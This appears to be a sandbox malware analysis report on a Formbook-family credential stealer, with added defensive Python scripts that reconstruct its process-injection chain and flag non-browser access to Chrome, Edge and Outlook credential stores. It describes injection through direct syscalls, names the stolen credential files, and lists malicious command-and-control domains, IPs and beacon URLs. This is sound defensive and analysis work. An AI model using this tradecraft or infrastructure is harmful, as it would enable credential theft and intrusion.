Source: NZuQxWwOkTbZ.exe, 00000002.00000002.4144250712.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000002.00000000.1708479515.0000000000F30000.00000002.00000001.00040000.00000000.sdmp, NZuQxWwOkTbZ.exe, 00000005.00000000.1854910937.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00737254 cpuid
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007340DA GetSystemTimeAsFileTime,__aulldiv
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0078C146 GetUserNameW
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_00742C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_0072E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
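The "Section loaded", "Memory written", "Thread APC queued" and "Process created" lines above describe one injection chain, and the "Direct from" lines list the NT calls the injected payload issues without going through the normal ntdll stub. The script below is an added example, not Joe Sandbox code: it parses a copy of those report lines (embedded with a " | " between source process and finding) and rebuilds the chain from the initial sample, lists every image that received foreign memory, and picks out which of the directly invoked syscalls are the classic remote-injection primitives. The set INJECTION_PRIMITIVES is the author's own grouping, not a Joe Sandbox classification.

```python
import re
from collections import defaultdict, deque

# Behaviour lines copied from this report's "HIPS / PFW / Operating System
# Protection Evasion" section (a " | " separates the source process from the
# finding).  Constructed input for the example, not live sandbox output.
REPORT_LINES = r"""
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe | Thread APC queued: target process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2872008
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DOC092024-0431202229487.exe"
Source: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
"""

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) \| (?P<kind>Section loaded|Memory written|"
    r"Thread APC queued|Process created|Nt\w+): (?P<rest>.+)$")
INJECT_KINDS = {"Section loaded", "Memory written", "Thread APC queued"}
# Author's grouping: NT calls that together implement remote-process
# injection.  Anti-debug / timing calls such as NtDelayExecution are excluded.
INJECTION_PRIMITIVES = {"NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                        "NtProtectVirtualMemory", "NtMapViewOfSection",
                        "NtResumeThread", "NtCreateUserProcess"}


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse(text):
    """Return (edges, syscalls): edges are (src, dst, kind) between process
    images; syscalls maps an Nt* name to the set of 'Direct from' addresses."""
    edges, syscalls = [], defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, kind, rest = basename(m["src"]), m["kind"], m["rest"]
        if kind.startswith("Nt"):
            syscalls[kind].add(rest.split("Direct from: ")[1])
        elif kind == "Section loaded":
            dst = rest.split("target: ", 1)[1].split(" protection: ")[0]
            edges.append((src, basename(dst), kind))
        elif kind == "Memory written":
            edges.append((src, basename(rest.split(" base: ")[0]), kind))
        elif kind == "Thread APC queued":
            edges.append((src, basename(rest.split("target process: ")[1]), kind))
        elif kind == "Process created":
            edges.append((src, basename(rest.split(' "')[0]), kind))
    return edges, syscalls


def chain(edges, root):
    """Images reachable from root through injection or spawn edges, in BFS
    order, each paired with the edge kind that first reached it."""
    seen, order, queue = {root}, [(root, None)], deque([root])
    while queue:
        cur = queue.popleft()
        for src, dst, kind in edges:
            if src == cur and dst not in seen:
                seen.add(dst)
                order.append((dst, kind))
                queue.append(dst)
    return order


def injected_into(edges):
    """Images that received memory, a mapped section or an APC from another process."""
    return sorted({dst for _, dst, kind in edges if kind in INJECT_KINDS})


def direct_injection_syscalls(syscalls):
    """Injection primitives that were issued as direct syscalls."""
    return sorted(INJECTION_PRIMITIVES & set(syscalls))


if __name__ == "__main__":
    edges, syscalls = parse(REPORT_LINES)
    for proc, how in chain(edges, "DOC092024-0431202229487.exe"):
        print(f"{proc:32s} {how or 'initial sample'}")
    print("injected into:", injected_into(edges))
    print("injection primitives as direct syscalls:", direct_injection_syscalls(syscalls))
```

Run as-is it prints the chain DOC092024-0431202229487.exe -> svchost.exe -> NZuQxWwOkTbZ.exe -> mstsc.exe -> firefox.exe, matching the behaviour graph further down; the same parser works on any report section once the source/finding separator is in place.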

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\mstsc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: DOC092024-0431202229487.exe, 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: DOC092024-0431202229487.exe | Binary or memory string: WIN_81
Source: DOC092024-0431202229487.exe | Binary or memory string: WIN_XP
Source: DOC092024-0431202229487.exe | Binary or memory string: WIN_XPe
Source: DOC092024-0431202229487.exe | Binary or memory string: WIN_VISTA
Source: DOC092024-0431202229487.exe | Binary or memory string: WIN_7
Source: DOC092024-0431202229487.exe | Binary or memory string: WIN_8
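The "File opened" and "Key opened" lines above are the stealer's credential harvesting: a Remote Desktop client (mstsc.exe) has no business reading Chrome's or Edge's Login Data, Cookies, Web Data or Local State, nor Outlook's MAPI profile key. The detection below is an added example, not Joe Sandbox code: it maps each sensitive store to the only image expected to open it and flags everything else. The mstsc.exe events are the report's own lines; the chrome.exe and OUTLOOK.EXE rows are constructed benign controls, and the owner-image allowlist is the author's assumption.

```python
import fnmatch
import ntpath
from collections import defaultdict

# Sensitive stores and the only images expected to open them.  Patterns are
# lower-case globs; fnmatch's '*' also spans backslashes, so one pattern covers
# Default\Cookies and Default\Network\Cookies alike.  Owner allowlist is an
# assumption for the example, not a vendor-documented list.
STORES = [
    (r"*\google\chrome\user data\*\login data", {"chrome.exe"}, "Chrome saved logins"),
    (r"*\google\chrome\user data\*cookies", {"chrome.exe"}, "Chrome cookies"),
    (r"*\google\chrome\user data\*\web data", {"chrome.exe"}, "Chrome autofill / payment data"),
    (r"*\google\chrome\user data\*local state", {"chrome.exe"}, "Chrome Local State (DPAPI-wrapped key)"),
    (r"*\microsoft\edge\user data\*\login data", {"msedge.exe"}, "Edge saved logins"),
    (r"*\microsoft\edge\user data\*cookies", {"msedge.exe"}, "Edge cookies"),
    (r"hkey_current_user\software\microsoft\windows nt\currentversion\windows messaging subsystem\profiles\*",
     {"outlook.exe"}, "Outlook MAPI profile"),
]

# (image, opened path or registry key).  mstsc.exe rows are copied from the
# report; the chrome.exe and OUTLOOK.EXE rows are constructed benign controls.
EVENTS = [
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State"),
    (r"C:\Windows\SysWOW64\mstsc.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    (r"C:\Windows\SysWOW64\mstsc.exe",
     "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
]


def classify(events):
    """Return (process, store label, path) for every store opened by a non-owner."""
    alerts = []
    for image, path in events:
        proc = ntpath.basename(image).lower()
        target = path.lower()
        for pattern, owners, label in STORES:
            if fnmatch.fnmatchcase(target, pattern):
                if proc not in owners:
                    alerts.append((proc, label, path))
                break  # first matching store wins; patterns do not overlap
    return alerts


def by_process(alerts):
    """Distinct store labels touched per process, for a triage summary."""
    summary = defaultdict(set)
    for proc, label, _ in alerts:
        summary[proc].add(label)
    return {proc: sorted(labels) for proc, labels in summary.items()}


if __name__ == "__main__":
    for proc, labels in by_process(classify(EVENTS)).items():
        print(proc, "->", "; ".join(labels))
```

The same rule carries over to Sysmon Event ID 11/12 or EDR file-open telemetry with no change to the patterns; only the event source differs. Note that the report also shows probes of paths that do not normally exist (Local State under Default and Default\Network), which is exactly the kind of speculative path walk a legitimate browser never performs.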

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007691DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\DOC092024-0431202229487.exe | Code function: 0_2_007696E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (matched techniques only; the number in parentheses is the count of signatures mapped to that technique)

Initial Access: Valid Accounts (2)
Execution: Native API (2)
Persistence: DLL Side-Loading (1); Valid Accounts (2)
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (31); Software Packing (1); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21)
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Impact: System Shutdown/Reboot (1)
Reconnaissance, Resource Development, Lateral Movement, Exfiltration: no techniques matched
Behavior Graph (ID 1509246): Sample: DOC092024-0431202229487.exe; Start date: 11/09/2024; Architecture: WINDOWS; Score: 100
Contacted: www.rtpngk.xyz, www.heldhold.xyz and 26 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 4 other signatures; Performs DNS queries to domains with low reputation (www.heldhold.xyz)
Process chain:
DOC092024-0431202229487.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> svchost.exe (started): Maps a DLL or memory area into another process
    -> NZuQxWwOkTbZ.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
      -> mstsc.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        -> NZuQxWwOkTbZ.exe (injected): Found direct / indirect Syscall (likely to bypass EDR); connects to www.heldhold.xyz 67.223.117.189 ports 63329, 63330, 63331 (VIMRO-AS15189US, United States); www.mfgarage.net 85.153.138.113 ports 63349, 63350, 63351 (TELECABLESpainES, Turkey); 10 other IPs or domains
        -> firefox.exe (started)

Source | Detection | Scanner | Label
DOC092024-0431202229487.exe | 24% | ReversingLabs | Win32.Trojan.Formbooks
DOC092024-0431202229487.exe | 29% | Virustotal
DOC092024-0431202229487.exe | 100% | Avira | HEUR/AGEN.1319153
DOC092024-0431202229487.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner
webredir.vip.gandi.net | 0% | Virustotal
linkwave.cloud | 0% | Virustotal
40wxd.top | 0% | Virustotal
doggieradio.net | 0% | Virustotal
030002304.xyz | 0% | Virustotal
206.23.85.13.in-addr.arpa | 1% | Virustotal
Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
http://www.40wxd.top/v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
https://whois.gandi.net/en/results?search=ultraleap.net | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency/zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= | 0% | Avira URL Cloud | safe
http://www.linkwave.cloud/al6z/ | 0% | Avira URL Cloud | safe
http://www.linkwave.cloud/al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
http://www.doggieradio.net/hzuv/ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal
http://www.030002304.xyz/tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
http://www.b5x7vk.agency/zznj/ | 0% | Avira URL Cloud | safe
http://www.heldhold.xyz/fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
http://www.kfowks.site/c0yj/ | 0% | Avira URL Cloud | safe
https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FpP_8%3DnzWo | 0% | Avira URL Cloud | safe
http://www.dalong.site/v2c3/ | 0% | Avira URL Cloud | safe
http://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
https://www.gandi.net/en/domain | 0% | Avira URL Cloud | safe
http://www.030002304.xyz/tmpg/ | 0% | Avira URL Cloud | safe
http://www.ultraleap.net/8pln/?pP_8=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
http://www.asiapartnars.online/kt2f/ | 0% | Avira URL Cloud | safe
http://www.kfowks.site | 0% | Avira URL Cloud | safe
http://www.63582.photo/5o7d/ | 0% | Avira URL Cloud | safe
http://www.mfgarage.net/3lu7/ | 0% | Avira URL Cloud | safe
http://www.useanecdotenow.tech/68ac/ | 0% | Avira URL Cloud | safe
http://www.2bhp.com/a4ar/?V0Qh=4pBta8&pP_8=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= | 0% | Avira URL Cloud | safe
http://www.rtpngk.xyz/altr/ | 0% | Avira URL Cloud | safe
http://www.dalong.site/v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= | 0% | Avira URL Cloud | safe
http://www.ultraleap.net/8pln/ | 0% | Avira URL Cloud | safe
http://www.heldhold.xyz/fava/ | 0% | Avira URL Cloud | safe
https://www.63582.photo/5o7d/?pP_8=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3Q | 0% | Avira URL Cloud | safe
http://www.40wxd.top/v4cy/ | 0% | Avira URL Cloud | safe
https://www.rtpngk.xyz/altr/?pP_8=VbdX0kog8qSHBufLtK | 0% | Avira URL Cloud | safe
http://www.doggieradio.net/hzuv/?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8= | 0% | Avira URL Cloud | safe
http://www.useanecdotenow.tech/68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU= | 0% | Avira URL Cloud | safe
http://www.mgeducacaopro.online/xamn/ | 0% | Avira URL Cloud | safe
http://www.asiapartnars.online/kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8 | 0% | Avira URL Cloud | safe
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| webredir.vip.gandi.net | 217.70.184.50 | true | true | | unknown |
| useanecdotenow.tech | 3.33.130.190 | true | true | | unknown |
| www.kfowks.site | 38.181.141.122 | true | true | | unknown |
| dalong.site | 172.96.187.60 | true | true | | unknown |
| www.b5x7vk.agency | 104.21.11.31 | true | true | | unknown |
| www.heldhold.xyz | 67.223.117.189 | true | true | | unknown |
| www.2bhp.com | 81.88.63.46 | true | true | | unknown |
| linkwave.cloud | 3.33.130.190 | true | true | | unknown |
| 40wxd.top | 206.119.82.134 | true | true | | unknown |
| doggieradio.net | 3.33.130.190 | true | true | | unknown |
| azkwupgf.as66588.com | 147.92.40.175 | true | true | | unknown |
| www.rtpngk.xyz | 188.114.97.3 | true | true | | unknown |
| 030002304.xyz | 65.21.196.90 | true | true | | unknown |
| asiapartnars.online | 3.33.130.190 | true | true | | unknown |
| mgeducacaopro.online | 3.33.130.190 | true | true | | unknown |
| www.mfgarage.net | 85.153.138.113 | true | true | | unknown |
| www.dalong.site | unknown | unknown | true | | unknown |
| www.useanecdotenow.tech | unknown | unknown | true | | unknown |
| www.ultraleap.net | unknown | unknown | true | | unknown |
| www.linkwave.cloud | unknown | unknown | true | | unknown |
| www.030002304.xyz | unknown | unknown | true | | unknown |
| www.mgeducacaopro.online | unknown | unknown | true | | unknown |
| www.asiapartnars.online | unknown | unknown | true | | unknown |
| www.40wxd.top | unknown | unknown | true | | unknown |
| www.doggieradio.net | unknown | unknown | true | | unknown |
| www.63582.photo | unknown | unknown | true | | unknown |
| 206.23.85.13.in-addr.arpa | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
| http://www.linkwave.cloud/al6z/ | true | Avira URL Cloud: safe | unknown |
| http://www.40wxd.top/v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| http://www.b5x7vk.agency/zznj/?V0Qh=4pBta8&pP_8=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= | true | Avira URL Cloud: safe | unknown |
| http://www.doggieradio.net/hzuv/ | true | Avira URL Cloud: safe | unknown |
| http://www.linkwave.cloud/al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| http://www.030002304.xyz/tmpg/?pP_8=CVP6mu+p7AIAUeNlIzILzbbwoLVaLtEPp22R6YZws2HFwQ6gURLmFkDuTnsSzWDqU9qDd9fOW/TdFJInumJ7doiOdR5iBNH/a8rQv0stnRBrBPHE6g/KoYg=&V0Qh=4pBta8 | true | Avira URL Cloud: safe | unknown |
| http://www.b5x7vk.agency/zznj/ | true | Avira URL Cloud: safe | unknown |
